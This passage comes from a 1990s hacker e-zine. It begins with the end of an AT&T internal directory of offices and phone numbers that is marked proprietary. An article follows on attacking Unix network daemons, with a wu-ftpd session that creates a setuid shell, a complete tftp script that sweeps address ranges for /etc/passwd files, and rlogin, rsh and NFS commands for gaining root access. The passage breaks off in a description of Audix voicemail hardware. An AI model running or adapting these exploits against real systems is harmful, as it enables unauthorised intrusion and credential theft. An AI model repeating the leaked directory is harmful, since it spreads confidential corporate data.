  2639. AT&T 16 CORPORATE WOODS BLVD.               ALBANY     NY 12211  518-447-6900
  2640. AT&T 2 JEFFERSON PLAZA, FLR 2               POUGHKEPSE NY 12601  914-485-7744
  2641. AT&T MARKETING 6597 KINNE RD                SYRACUSE   NY 13214  315-445-3800
  2642. AT&T 300 PEARL ST. OLYMPIA TOWERS           BUFFALO    NY 14202  716-849-6000
  2643. BUFFALO INSTALL. 25 JOHN GLENN DR.          AMHERST    NY 14228  716-691-2711
  2644. AT&T 1 MARINE MIDLAND PLZ.                  ROCHESTER  NY 14604  716-777-4400
  2645. CET 5151 BLAZER MEM. PKWY                   DUBLIN     OH 43017  614-764-5454
  2646. COLUMBUS WORKS 6200 E. BROAD ST.            COLUMBUS   OH 43213  614-860-2000
  2647. AT&T ONE SEAGATE, SUITE 750                 TOLEDO     OH 43604  419-245-3700
  2648. AT&T-NS 55 ERIEVIEW PLAZA 4TH FL.           CLEVELAND  OH 44114  216-664-6500
  2649. ADP 7007 E. PLEASANT VALLEY                 INDEPNDNCE OH 44131  216-447-1980
  2650. NAT'L ACCOUNT 1 FIRST NAT'L PLAZA           DAYTON     OH 44502  513-449-7800
  2651. AT&T 7725 W. RENO AVE.                      OK. CITY   OK 73126  405-491-3000
  2652. AT&T LGE BUS. MACHINES 2020 S.W. 4TH AVE.   PORTLAND   OR 97201  503-295-5000
  2653. AT&T MICROELECT 1220 SW GREENBURGH RD       PORTLAND   OR 97223  503-244-3883
  2654. AT&T COMMERCE CT. 4 STATION SQ. SUITE 770   PITTSBURGH PA 15219  412-338-4800
  2655. AT&T 4 GATEWAY CTR. SUITE 500               PITTSBURGH PA 15222  412-392-8200
  2656. AT&T 470 STREETS RUN RD.                    PITTSBURGH PA 15236  412-882-1845
  2657. HARRISBURG 2080 LINGLESTOWN RD.             HARRISBURG PA 17110  717-540-7251
  2658. ALLENTOWN-BETHLEHEM 2255 AVE. A             BETHLEHEM  PA 18018  215-861-2700
  2659. AT&T-BL STC RT 222                          BREINIGSVL PA 18103  215-391-2000
  2660. AT&T MICROELECT. 961 MARCON BLVD.           ALLENTOWN  PA 18103  215-266-2900
  2661. ALLENTOWN-BL 1247 SO. CEDAR CREST BLVD.     ALLENTOWN  PA 18103  215-770-2200
  2662. AT&T 1 IMPERIAL WAY 2ND FL.                 ALLENTOWN  PA 18195  215-398-5800
  2663. AT&T 3 BALA PLAZA WEST BLDG.                BALA CYNWD PA 19004  215-581-2400
  2664. AT&T 514 KAISER DR.                         FOLCROFT   PA 19032  215-724-5250
  2665. AT&T 1800 JFK BLVD., SUITE 1300             PHILADELPH PA 19103  215-972-1300
  2666. KING OF PRUSSIA 601 ALLENDALE RD.           KING OF PR PA 19406  215-768-2600
  2667. READING WORKS 2525 N. 12TH ST.              READING    PA 19604  215-939-7011
  2668. AT&T NASSAU RECYCLE 4201 W. COLUMBIA        CASEY      SC 29033  803-796-4720
  2669. AT&T 1201 MAIN ST. 22ND FL.                 COLUMBIA   SC 29201  803-733-3800
  2670. AT&T 111 WESTWOOD PL. 3RD FL.               BRENTWOOD  TN 37027  615-377-4000
  2671. AT&T MICROELECT. 195 POLK AVE.              NASHVILLE  TN 37211  615-749-8222
  2672. AT&T REPAIR CTR 653 MAINSTREAM DR.          NASHVILLE  TN 37228  615-242-1950
  2673. NASHVILLE MSL 566 MAINSTREAM DR.            NASHVILLE  TN 37228  615-256-4111
  2674. AT&T 9041 EXECUTIVE PARK                    KNOXVILLE  TN 37923  615-690-3400
  2675. AT&T-NS SALES 909 E.LAS COLINAS BLVD        IRVING     TX 75039  214-401-4700
  2676. DALLAS WORKS 3000 SKYLINE DRIVE             MESQUITE   TX 75149  214-284-2000
  2677. AT&T-NS 1201 MAIN ST. SUITE 2555            DALLAS     TX 75202  214-745-4790
  2678. AT&T 5525 LBJ FREEWAY                       DALLAS     TX 75240  214-308-2000
  2679. AT&T 2501 PARKVIEW DR., SUITE 200           FT.WORTH   TX 76102  817-870-4400
  2680. AT&T-NS 2900 N. LOOP WEST                   HOUSTON    TX 77092  713-956-4400
  2681. AT&T CITYVIEW 10999 IH 10 W                 SAN ANTON  TX 78230  512-691-5700
  2682. AT&T 5444 S. STAPLES                        CORPUS CHR TX 78411  512-994-4400
  2683. AT&T 8911 CAP. OF TEX HGHWY                 AUSTIN     TX 78759  512-343-3000
  2684. AT&T 415 WEST 8TH ST. SUITE 307             AMARILLO   TX 79101  806-374-9435
  2685. AT&T-BMG 3000 N. GARFIELD SUITE 180         MIDLAND    TX 79705  915-687-8700
  2686. AT&T-NS 10521 ROSEHAVEN ST.                 FAIRFAX    VA 22030  703-352-0900
  2687. AT&T-NS 12450 FAIR LAKES CIRCLE             FAIRFAX    VA 22033  703-631-3288
  2688. AT&T-BELL LABS 1201 S. HAYES ST.            ARLINGTON  VA 22202  703-769-8900
  2689. AT&T 1550 WILSON BLVD.                      ARLINGTON  VA 22209  703-247-4690
  2690. AT&T FED SYS 1201 S. HAYES ST.              ARLINGTON  VA 22209  703-685-8678
  2691. AT&T MAJOR MKT & SALES 600 EAST BROAD ST.   RICHMOND   VA 23219  804-775-3300
  2692. AT&T OSO 1530 E. RUN RD.                    RICHMOND   VA 23228  804-262-4062
  2693. RICHMOND WORKS 4500 S. LABURNUM AVE.        RICHMOND   VA 23231  804-226-5000
  2694. AT&T 1338 PLANTATION RD NE                  ROANOKE    VA 24012  703-344-1160
  2695. NEW RIVER VALLEY CALLER 21                  RADFORD    VA 24143  703-731-8000
  2696. AT&T 2901 THIRD AVE.                        SEATTLE    WA 98121  206-443-7000
  2697. AT&T ACCT MGMT 2121 4TH AVE.                SEATTLE    WA 98121  206-728-4749
  2698. AT&T N. 9 POST SUITE 330                    SPOKANE    WA 99201  509-747-6110
  2699. AT&T 400 S. EXECUTIVE DR.                   BROOMFIELD WI 53005  414-785-9110
  2700. MILWAUKEE CP/ASSEM.CTR                      MILWAUKEE  WI 53212  414-963-8200
  2701. AT&T 2802 INTERNAT'L LN, 2ND FLR            MADISON    WI 53704  608-241-8900
  2702. AT&T 900 PENNSYLVANIA AVE.                  CHARLESTON WV 25302  304-347-2000
  2703. MARTINSBURG MMC TABLER STA.RD.              MARTINSBRG WV 25401  304-263-6931
  2704. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2705.  
  2706. And remember...
  2707.  
  2708. All directory information is classified AT&T Proprietary and, as such, should
  2709. be safeguarded as outlined in GEI 2.2.  Responsibility for security is passed
  2710. on to each employee receiving the directory.
  2711.  
  2712.  
  2713. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  2714.  
  2715.  
  2716.  
  2717.  
  2718.                   Playing with the Internet Daemons
  2719.  
  2720.                                 by
  2721.  
  2722.                            Voyager [TNO]
  2723.  
  2724.  
  2725. Internet hosts communicate with each other using either TCP
  2726. (Transmission Control Protocol) or UDP (User Datagram Protocol) on top
  2727. of IP (Internet Protocol).  Other protocols are used on top of IP, but
  2728. TCP and UDP are the ones that are of interest to us.  On a Unix system,
  2729. the file /etc/protocols will list the available protocols on your
  2730. machine
  2731.  
  2732. On the Session Layer (OSI model) or the Internet Layer (DOD Protocol
  2733. Model) data is moved between hosts by using ports.  Each data
  2734. communication will have a source port number and a destination port
  2735. number.  Port numbers can be divided into two types, well-known ports
  2736. and dynamically allocated ports.  Under Unix, well-known ports are
  2737. defined in the file /etc/services.  In addition, RFC (Request For
  2738. Comments) 1700 "Assigned Numbers" provides a complete listing of all
  2739. well-known ports.  Dynamically allocated port numbers are assigned as
  2740. needed by the system.
  2741.  
  2742. Unix provides the ability to connect programs called daemons to
  2743. well-known ports.  The remote computer will connect to the well-known
  2744. port on the host computer, and be connected to the daemon program.
  2745.  
  2746. Daemon programs are traditionally started by inetd (The Internet
  2747. Daemon).  Daemon programs to be executed are defined in the inetd
  2748. configuration file, /etc/inetd.conf.
  2749.  
  2750. Most of these daemons run as a priveledged user, often as root.  Many of
  2751. these programs have vulnerabilities which can be exploited to gain access
  2752. to remote systems.
  2753.  
  2754. The daemons we are interested in are:
  2755.  
  2756.         Service          Port Number    Description
  2757.         ~~~~~~~~~~~~~    ~~~~~~~~~~~    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2758.         ftp              21             File Transfer [Control]
  2759.         smtp             25             Simple Mail Transfer Protocol
  2760.         tftp             69             Trivial File Transfer Protocol
  2761.         finger           79             Finger
  2762.         www-http         80             World Wide Web HTTP
  2763.         sunrpc          111             SUN Remote Procedure Call
  2764.         fln-spx         221             Berkeley rlogind with SPX auth
  2765.         rsh-spx         222             Berkeley rshd with SPX auth
  2766.         netinfo         716-719         NetInfo
  2767.         ibm-res         1405            IBM Remote Execution Starter
  2768.         nfs             2049            Network File System
  2769.         x11             6000-6063       X Window System
  2770.  
  2771.         rcp/rshd                        Remote Copy/Remote Shell Daemon
  2772.         nis                             Network Information Services
  2773.  
  2774.  
  2775.  
  2776.  
  2777.  
  2778. The next part of this article will focus on specific daemons and their
  2779. known vulnerabilities.  The vulnerabilities with brief explanations will be
  2780. explained here.  For the more complicated exploits, which are beyond the
  2781. scope of a concise article, more research will be required on the part of
  2782. the reader.
  2783.  
  2784.  
  2785.  
  2786.  --> ftp              21    File Transfer [Control]
  2787.  
  2788. FTP is the File Transfer Protocol.  FTP requests are answered by the FTP
  2789. daemon, ftpd.  wuarchive's ftpd versions below 2.2 have a vulnerability
  2790. where you can execute any binary you can see with the 'site exec'
  2791. command by calling it with a relative pathname with "../" at the
  2792. beginning.  Here is a sample exploit:
  2793.  
  2794. Login to the system via ftp:
  2795.  
  2796.         220 uswest.com FTP server (Version wu-2.1(1) ready.
  2797.         Name (uswest.com:waltman): waltman
  2798.         331 Password required for waltman.
  2799.         Password: jim
  2800.         230 User waltman logged in.
  2801.         Remote system type is UNIX.
  2802.         Using binary mode to transfer files.
  2803.         ftp> quote "site exec cp /bin/sh /tmp/.tno"
  2804.         200-cp /bin/sh /tmp/tno
  2805.         ftp> quote "site exec chmod 6755 /tmp/.tno"
  2806.         200-chmod 6755 /tmp/tno
  2807.         ftp> quit
  2808.         221 Goodbye.
  2809.  
  2810.  
  2811.  
  2812. --> smtp             25    Simple Mail Transfer Protocol
  2813.  
  2814. Mail attacks are one of the oldest known methods of attacking Internet
  2815. hosts.  The most common mail daemon, and least secure, is sendmail. Other
  2816. mail daemons include smail, MMDF,and IDA sendmail.  Sendmail has had too
  2817. many vulnerabilities to list them all.  There is an entire FAQ written
  2818. specifically on sendmail vulnerabilities, therefore we will not cover them
  2819. heavily here.
  2820.  
  2821. One well known vulnerability, useful only for historical purposes, is
  2822. "Wizard Mode."  In Wizard mode you could request a shell via Port 25
  2823. (The SMTP port).  No modern system will be vulnerable to this attack.  To
  2824. exploit this vulnerability, you telnetted to port 25, typed WIZ to enter
  2825. Wizard mode, and entered the password.  The problem related to the way
  2826. the encrypted password was stored.  There was a bug that caused the
  2827. system to believe that no password was as good as the real password.
  2828.  
  2829. To quote Steven Bellovin:
  2830.  
  2831.         The intended behavior of wizard mode was that if you supplied
  2832.         the right password, some other non-standard SMTP commands were
  2833.         enabled, notably one to give you a shell.  The hashed password
  2834.         -- one-way encrypted exactly as per /etc/passwd -- was stored in
  2835.         the sendmail configuration file.  But there was this bug; to
  2836.         explain it, I need to discuss some arcana relating to sendmail
  2837.         and the C compiler.
  2838.  
  2839.         In order to save the expense of reading and parsing the
  2840.         configuration file each time, sendmail has what's known as a
  2841.         ``frozen configuration file''.  The concept is fine; the
  2842.         implementation isn't.  To freeze the configuration file,
  2843.         sendmail just wrote out to disk the entire dynamic memory area
  2844.         (used by malloc) and the `bss' area -- the area that took up no
  2845.         space in the executable file, but was initialized to all zeros
  2846.         by the UNIX kernel when the program was executed.  The bss area
  2847.         held all variables that were not given explicit initial values
  2848.         by the C source. Naturally, when delivering mail, sendmail just
  2849.         read these whole chunks back in, in two giant reads.  It was
  2850.         therefore necessary to store all configuration file information
  2851.         in the bss or malloc areas, which demanded a fair amount of care
  2852.         in coding.
  2853.  
  2854.         The wizard mode password was stored in malloc'ed memory, so it
  2855.         was frozen properly.  But the pointer to it was explicitly set
  2856.         to NULL in the source:
  2857.  
  2858.         char    *wiz = NULL;
  2859.  
  2860.         That meant that it was in the initialized data area, *not* the
  2861.         bss. And it was therefore *not* saved with the frozen
  2862.         configuration.  So -- when the configuration file is parsed and
  2863.         frozen, the password is read, and written out.  The next time
  2864.         sendmail is run, though, the pointer will be reset to NULL.
  2865.         (The password is present, of course, but there's no way to find
  2866.         it.)  And the code stupidly believed in the concept of no
  2867.         password for the back door.
  2868.  
  2869.         One more point is worth noting -- during testing, sendmail did
  2870.         the right thing with wizard mode.  That is, it did check the
  2871.         password -- because if you didn't happen to do the wizard mode
  2872.         test with a frozen configuration file -- and most testing would
  2873.         not be done that way, since you have to refreeze after each
  2874.         compilation -- the pointer would be correct.
  2875.  
  2876.  
  2877.  
  2878.  --> tftp             69    Trivial File Transfer Protocol
  2879.  
  2880. tftp is the Trivial File Transfer Protocol.  tftp is most often used to
  2881. attempt to grab password files from remote systems.  tftp attacks are so
  2882. simple and repetitive that scripts are written to automate the process
  2883. of attacking entire domains.  Here is one such script:
  2884.  
  2885.    #!/bin/sh
  2886.    ########################################################################
  2887.    #                     TFTP snagger by Yo
  2888.    # It snags /etc/passwd files from all hosts with open 69 (tftp) port.
  2889.    # scans all hosts from XX.XX.0.0 - XX.XX.255.255
  2890.    # you can run it in the background in following way:
  2891.    #                snag [hostname] > /dev/null &
  2892.    #     [hostname] might be used IP # (with -ip option) as well as FQDN
  2893.    #                   Last Updated 10/20/92
  2894.    #
  2895.    #            Highly modified by ThePublic on 10/21/92
  2896.    ########################################################################
  2897.    case $1 in
  2898.     '')
  2899.      echo " Usage: $0 [hostname]  to run in the foreground                    "
  2900.      echo "        $0 [hostname] > /dev/null & to run in the background       "
  2901.      echo " The [hostname] can be specialized in fully qualified domain name  "
  2902.      echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain.        "
  2903.      echo " as well as IP with -ip option.                                    "
  2904.       exit 1
  2905.       ;;
  2906.     -ip)
  2907.     if [ $2x = x ]; then
  2908.      echo " Usage: $0 $1 the IP "
  2909.      exit 1
  2910.       else
  2911.           x=`echo $2 | cut -d. -f1`
  2912.          xx=`echo $2 | cut -d. -f2`
  2913.         xxx=`echo $2 | cut -d. -f3`
  2914.        xxxx=`echo $2 | cut -d. -f4`
  2915.    #                        ^ field delimiter is '.' -- get field 1/2/3/4
  2916.     fi;;
  2917.      *)
  2918.    if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then
  2919.                                   # -x is for SunOs
  2920.     echo sorry dude, no nslookup server .. try it with -ip option.
  2921.    exit 1
  2922.    fi
  2923.    x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1`
  2924.    #                                          ^ 7 chars   ^ last line
  2925.    if [ "$x1" = '' ]; then
  2926.    echo " There is no such domain. Nothing to scan. Exit. "
  2927.    exit 1
  2928.    fi
  2929.       x=`echo $x1 | cut -d. -f1`  # get the first set of #, ##, or ###
  2930.      xx=`echo $x1 | cut -d. -f2`  # get the second set
  2931.     xxx=0                         # ignore the rest, if any
  2932.    xxxx=0
  2933.       ;;
  2934.     esac
  2935.    if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
  2936.     echo There is no such domain. Nothing to scan.
  2937.    exit 1
  2938.    fi
  2939.    while [ $x -ne 255 ]; do
  2940.  
  2941.    while [ $xx -ne 255 ]; do
  2942.    while [ $xxx -ne 255 ]; do
  2943.    while [ $xxxx -ne 255 ]; do
  2944.    target=$x.$xx.$xxx.$xxxx
  2945.    trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1"
  2946. 2
  2947.    tftp << EOF
  2948.    c $target
  2949.    mode ascii
  2950.    trace
  2951.    get /etc/passwd passwd.$target
  2952.    quit
  2953.    EOF
  2954.    if [ ! -s passwd.$target ]  ; then
  2955.     rm -rf passwd.$target
  2956.    echo `date`  $target has rejected an attempt >> .info
  2957.      else
  2958.      mv passwd.$target  .good.$target
  2959.        echo `date` $target is taken, all data is stored in .good.$target file >>
  2960. .info
  2961.     fi
  2962.     xxxx=`expr $xxxx + 1 `
  2963.    done
  2964.    xxxx=0
  2965.    xxx=`expr $xxx + 1 `
  2966.    done
  2967.    xxx=0
  2968.    xx=`expr $xx + 1 `
  2969.    done
  2970.    xx=0
  2971.    x=`expr $x + 1 `
  2972.    done
  2973.  
  2974.  
  2975.  
  2976.  --> finger           79    Finger
  2977.  
  2978. The finger command displays information about another user, such as login
  2979. name, full name, terminal name, idle time, login time, and location if
  2980. known.  finger requests are answered by the fingerd daemon.
  2981.  
  2982. Robert Tappan Morris's Internet Worm used the finger daemon.  The finger
  2983. daemon allowed up to 512 bytes from the remote machine as part of the
  2984. finger request.  fingerd, however, suffered from a buffer overflow bug
  2985. caused by a lack proper bounds checking.  Anything over 512 got
  2986. interpreted by the machine being fingered as an instruction to be
  2987. executed locally, with whatever privileges the finger daemon had.
  2988.  
  2989.  
  2990.  
  2991.  --> www-http         80    World Wide Web HTTP
  2992.  
  2993. HTML (HyperText Markup Language) allows web page user to execute
  2994. programs on the host system.  If the web page designer allows the web
  2995. page user to enter arguments to the commands, the system is vulnerable
  2996. to the usual problems associated with system() type calls.  In addition,
  2997. there is a vulnerability that under some circumstances will give you an
  2998. X-Term using the UID that the WWW server is running under.
  2999.  
  3000.  
  3001.  
  3002.  --> sunrpc          111    SUN Remote Procedure Call
  3003.  
  3004. Sun RPC (Remote Procedure Call) allows users to execute procedures on
  3005. remote hosts.  RPC has suffered from a lack of secure authentification.
  3006. To exploit RPC vulnerabilities, you should have a program called "ont"
  3007. which is not terribly difficult to find.
  3008.  
  3009.  
  3010.  
  3011.  --> login           513   Remote login
  3012.  
  3013. Some versions of AIX and Linux suffer from a bug in the way that
  3014. rlogind reads arguments.  To exploit this vulnerability, issue this
  3015. command from a remote system:
  3016.  
  3017. rlogin host -l -froot
  3018.  
  3019. Where host is the name of the target machine and username is the username
  3020. you would like to rlogin as (usully root).  If this bug exists on the
  3021. hosts system, you will be logged in, without being asked for a password.
  3022.  
  3023.  
  3024.  
  3025.  --> rsh-spx         222    Berkeley rshd with SPX auth
  3026.  
  3027. Some versions of Dynix and Irix have a bug in rshd that allows you to
  3028. run commands as root.  To exploit this vulnerability, issue this command
  3029. from the remote system:
  3030.  
  3031. rsh host -l "" /bin/sh
  3032.  
  3033.  
  3034.  
  3035.  --> netinfo         716-719    NetInfo
  3036.  
  3037. NeXT has implemented a protocol known as NetInfo so that one NeXT
  3038. machine can query another NeXT machine for information.  A NetInfo
  3039. server will by default allow unrestricted access to system databases.
  3040. This can be fixed by the System Administrator.  One of the pieces of
  3041. information netinfo will give up is the password file.
  3042.  
  3043.  
  3044.  
  3045.  --> ibm-res         1405   IBM Remote Execution Starter
  3046.  
  3047. rexd (the remote execution daemon) allows you to execute a program on
  3048. another Unix machine.  AIX, NeXT and HPUX versions of rexd have suffered
  3049. from a vulnerability allowing unintended remote execution. The rexd
  3050. daemon checks your uid on the machine you are coming from, therefore you
  3051. must be root on the machine you are mounting the rexd attack from.  To
  3052. determine if your target machine is running rexd, use the 'rcp -p
  3053. <target>' command.  You will also need the exploit program known as 'on'
  3054. which is available on fine H/P boards everywhere.
  3055.  
  3056.  
  3057.  
  3058.  --> nfs             2049            Network File System
  3059.  
  3060. NFS, the Network File System, from Sun Microsystems has suffered from
  3061. multiple security vulnerabilities.  In addition, many system
  3062. administrators configure NFS incorrectly, allowing unintended remote
  3063. access.
  3064.  
  3065. Using the command 'showmount -e <target>' you can view what file systems
  3066. are exported from a machine.  Many administrators allow read access to
  3067. the /etc directory, allowing you to copy the password file. Other
  3068. administrators allow write access to user directories, allowing you to
  3069. create .rhosts files and gain access to the machine via rlogin or rsh.
  3070.  
  3071. In addition to configuration issues, NFS is vulnerable to attacks using
  3072. a uid masking bug, a mknod bug, and a general file handle guessing
  3073. attack.  Several hacked versions of the mount command have been written
  3074. to exploit known vulnerabilities.
  3075.  
  3076.  
  3077.  
  3078.  --> x11             6000-6063       X Window System
  3079.  
  3080. X-Windows has suffered and currently suffers from numerous
  3081. vulnerabilities. One vulnerability allows you to access another users
  3082. display, another allows you to view another users keystrokes.  Another
  3083. vulnerability allows a remote attacker to run every program that the
  3084. root user starts in his or her .xsession file.  Yet another X-Windows
  3085. vulnerability allows a local user to create a root entry in the
  3086. /etc/passwd file.
  3087.  
  3088.  
  3089.  
  3090.  --> rcp
  3091.  
  3092. The SunOS 4.0.x rcp utility can be exploited by any trusted host listed
  3093. in /etc/hosts.equiv or /.rhosts.  To exploit this hole you must be
  3094. running NFS (Network File System) on a Unix system or PC/NFS on a DOS
  3095. system.
  3096.  
  3097.  
  3098.  
  3099.  --> NIS
  3100.  
  3101. Sun's NIS (Network Information Service) also known as yp (Yellow Pages)
  3102. has a vulnerability where you can request an NIS map from another NIS
  3103. domain if you know the NIS domain name of the target system.  There is
  3104. no way to query a remote system for it's NIS domainname, but many NIS
  3105. domain names are easily guessable.  The most popular NIS map to request
  3106. is passwd.byname, the NIS implementation of /etc/passwd.  In addition,
  3107. if you have access to a diskless Unix workstation, you can determine the
  3108. NIS domain name of the server it boots from.
  3109.  
  3110.         +--------------------------------------------------------+
  3111.         + Do not confuse NIS domain names with DNS domain names! |
  3112.         +--------------------------------------------------------+
  3113.  
  3114.  
  3115.  
  3116.  --> Other attacks
  3117.  
  3118. In addition to these daemon based attacks, many other methods can be
  3119. used to gain access to a remote computer.  These include, but are not
  3120. limited to: default accounts, password guessing, sniffing, source
  3121. routing, DNS routing attacks, tcp sequence prediction and uucp
  3122. configuration exploits.
  3123.  
  3124. This should give you an idea on how daemon based attacks function.  By
  3125. no means is this a complete list of security vulnerabilities in
  3126. privileged internet daemons.  To discover more information about how
  3127. these daemons operate, and how to exploit their vulnerabilities, I
  3128. highly recommend reading source code, man pages and RFC's.
  3129.  
  3130.  
  3131.                                                         Voyager[TNO]
  3132.  
  3133.  
  3134. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  3135.  
  3136.  
  3137.  
  3138.  
  3139.                 [][][][][][][][][][][][][][][][][][][][][][]
  3140.                 [[[                                      ]]]
  3141.                 [[[[  THE DEFINITY AUDIX VMS INSIDE OUT ]]]]
  3142.                 [[[[[                                  ]]]]]
  3143.                 [[[[[[[        by: Boba Fett         ]]]]]]]
  3144.                 [[[[[[[[[[[                      ]]]]]]]]]]]
  3145.                 [][][][][][][][][][][][][][][][][][][][][][]
  3146.  
  3147.  
  3148. - " What?! Another crummy file on the Audix voice mail? "
  3149.  
  3150. Not exactly. In COTNO #1, you will find a good article on identifying and
  3151. obtaining mailboxes on the Audix Voice Mail System (VMS). This paper will
  3152. discuss the physical/electrical design of the Audix System and how it's
  3153. integrated with the Definity switch. I will not discuss how to obtain
  3154. dialups to the audix or hacking it, that's another file :). Most of the
  3155. information and diagrams in this paper where gathered from various sources.
  3156. Mainly, the AT&T Tech. Journal may/june 1994, and some very cooperative AT&T
  3157. representatives. ;)
  3158.  
  3159.  
  3160. 1) Hardware
  3161. -----------
  3162.  
  3163. All right, what does this baby look like? Well, all in all, it's quite simple.
  3164. There are 4 major components, all of which can be easily replaced or removed.
  3165. A tape drive, a hard disk and 2 circuit boards. Here's what the Definity Audix's
  3166. front panel looks like.
  3167.  
  3168.  
  3169.                Disk/Alarm board      MFB panel
  3170.  
  3171.             .---------------------.__.-----.
  3172.             |  _______________    |  |     |
  3173.             | |               |   |  |  o  <----- Red LED
  3174.             | |               |   |  |     |
  3175.             | |          |||  |   |  |  O  <---------- "Enter/yes" Button
  3176.             | |          |||  |   |  | __  |
  3177.  Tape   ----->|         ||||  |   |  | ||  |
  3178.  Unit       | |         ||||  |   |  | ||  |
  3179.             | |          |||  |   |  | ||  <----- Alphanumeric liquid
  3180.             | |          |||  |   |  | ||  |      crystal display(10 character)
  3181.             | |          |||  |   |  | --  |
  3182.             |  ---------------    |  |  O  <---- "Next/no" button
  3183.             |                     |  |     |
  3184.             |                     |  |     |
  3185. Boot/    ----------------->  O    |  |  O  <---- "Back" button
  3186. shutdown    |                     |  |Back |
  3187. button      | .--------.          |  |     |
  3188.             | | Some   |          |  |     |
  3189.             | | stupid |      _   |  |  _  |
  3190.             | | warning|     | |  |  | | <-------------- Handles/
  3191.             | | label. |     | |  |  | | | |    /        latch
  3192.             | |________|     | <----------------
  3193.             .________________|_|__|--|_|_|_|
  3194.  
  3195.  
  3196. As you can see, it consists of two boards: The multifunction board (right), and
  3197. the disk/alarm board (left).
  3198.  
  3199. o MFB major components:
  3200.  
  3201.         - A 386 processor  (supports Unix System V) with 16 megs of dynamic
  3202.           RAM (DRAM).
  3203.         - An array of six 50 mhz digital signal processors (DSPs).
  3204.         - The Definity switch time-division multiplexed (TDM) bus interface.
  3205.         - An alarm monitoring processor. :(
  3206.  
  3207. o D/ALB major components:
  3208.  
  3209.         - A tape drive
  3210.         - A Hard Drive
  3211.         - An online modem for REMOTE ALARM NOTIFICATION, AND REMOTE MAINTENANCE.
  3212.  
  3213.  
  3214. The modem is included with the package. If the on-board modem does not
  3215. comply with the local telco rules (for example foreign countries) , than
  3216. through the RS-232 port an external one can be attached. Let's take a deeper
  3217. look inside and see where the components go.
  3218.  
  3219.                           .--------------------------------------.
  3220.                          /|          + Disk/Alarm Board +        |__Tip/Ring
  3221.    .--------.          /  | .------------------remote acs ports--|___RS-232
  3222.    |        |        /    | |                                    |
  3223.    |        |      /      | |  .------|--------|--------Ethernet----- LAN
  3224.    |S       |    /        | |  |    Tape  System Disk  controller|
  3225.    |W       |  /          |_|__|_________________________________|
  3226.    |I       |/            |-|--|---------------------------------|
  3227.    |T|======|             | |  |    + Multifunction Board +      |
  3228.    |C| Audix|             | |  |                                 |
  3229.    |H|======|             | |  |                      /============== RS-232
  3230.    |        |\            | |  SCSI      386 Serial Data  Packet |
  3231.    |________| \           | | Interface  CPU async/sync.  bus    |--- Packet
  3232.                 \         | | -|-----------|-------|------inter- |     Bus
  3233.                   \       | |  |         16 Meg    DMA     face  |
  3234.                     \     |  Faceplate    RAM       | \    |     |
  3235.                       \   |   & Control             |   \ TDM    |
  3236.                         \ |                3 DSP 32Cs---Interface|--- TD bus
  3237.                           \______________________________________|
  3238.  
  3239.  
  3240. o Explanation of some terms:
  3241.  
  3242.         CPU: Central Processing Unit
  3243.         DSP: Digital Signal Processor
  3244.         TDM: Time-Division Multiplexed
  3245.         DMA: Direct Memory Access
  3246.         SCSI: Small Computer System Interface
  3247.  
  3248. The Definity Audix VMS is so compact because it has to fit in the Definity
  3249. PBX's port slot. It can: detect a incoming call, detect when the caller has
  3250. disconnected, disconnect a call on ANY port. It can also, disable any port to
  3251. prevent it from receiving incoming calls, and most important of all, it can
  3252. originate outgoing calls. It is also good to know that it has CLID.
  3253. Here's a list of it's functions:
  3254.  
  3255.         - Call History Information (Called Party ID,Calling party ID and
  3256.                              reason for call).
  3257.         - Integrated message waiting notification (LED).
  3258.         - Disconnect message (Contact Administrator for help, please disconnect
  3259.                              goodbye).
  3260.         - Message waiting status information (Updated on activity, Audit of
  3261.                              each vmb and refresh of all vmbs).
  3262.         - Maintenance info. for link.
  3263.         - Audix control of port. (disconnect call, detect caller, etc..)
  3264.  
  3265. I've been referring to it as the Definity Audix, and not just Audix. Audix,
  3266. (aka Audix release 1), was first introduced in 1984. The Definity Audix,
  3267. however, was introduced in 1992, and came with a series of more advanced
  3268. features. For example, the time scale modification option was improved, allowing
  3269. the playback of messages at slower or faster speeds. Or the speech
  3270. encoder/decoder algorithm which was changed resulting in better sound quality
  3271. (so they say). How can you tell if it's a Definity when calling it remotely?
  3272. Well, quite frankly I'm not sure. There is a way, however, it isn't very easy to
  3273. apply. The Audix, release 1 system takes approx. 1 second to detect your DTMF
  3274. tones. Now, the Definity, on the other hand, takes only about 25 milliseconds,
  3275. less than half the time. You can time the reaction, and figure out what your
  3276. dealing with, but there are many things that can affect the response time also
  3277. (for example, the amount of people using the voice mail). As you can see
  3278. this method isn't very reliable.
  3279.  
  3280. 2) Software
  3281. -----------
  3282.  
  3283. The system software resides on a single 160 meg casettee tape. It is loaded
  3284. on the hard disk whenever an installation or upgrade is being performed.
  3285. There is also a big part of the code, which constantly monitors multiple
  3286. thermal sensors on the two circuit packs, making sure that they don't over
  3287. heat.
  3288.  
  3289. The chick's sweet voice you hear when interacting with the VMS, is composed
  3290. of multiple fragments. A fragment can be a single word, a complete sentence,
  3291. or a bunch of sentences. For example, "Please enter extension and pound sign"
  3292. is most likely to be two fragments. The first being "please enter extension"
  3293. and the second being "and pound sign". Obviously, this is used to save space.
  3294. A second recording is: "Enter password and pound sign", the "and pound sign"
  3295. is the same fragment as in the first one. Since AT&T sells it's Audix system
  3296. in nearly 80 countries, there are a couple of different language tapes also.
  3297. So don't be surprised if you encounter a Spanish or Japanese Audix VMS.
  3298. Currently AT&T offers ten language tapes and the Definity Audix can support
  3299. up to nine different language tapes simultaneously.
  3300.  
  3301.  
  3302. "So if it's an Audix voice mail then there's a Definity PBX, right? "
  3303.  
  3304. Wrong. Even though it fits the Definity PBX like a glove, it can be integrated
  3305. with other switches. Some of the most common are:
  3306.  
  3307.         - G3I        - System 25
  3308.         - G3S        - System 75
  3309.         - G3R        - System 85
  3310.  
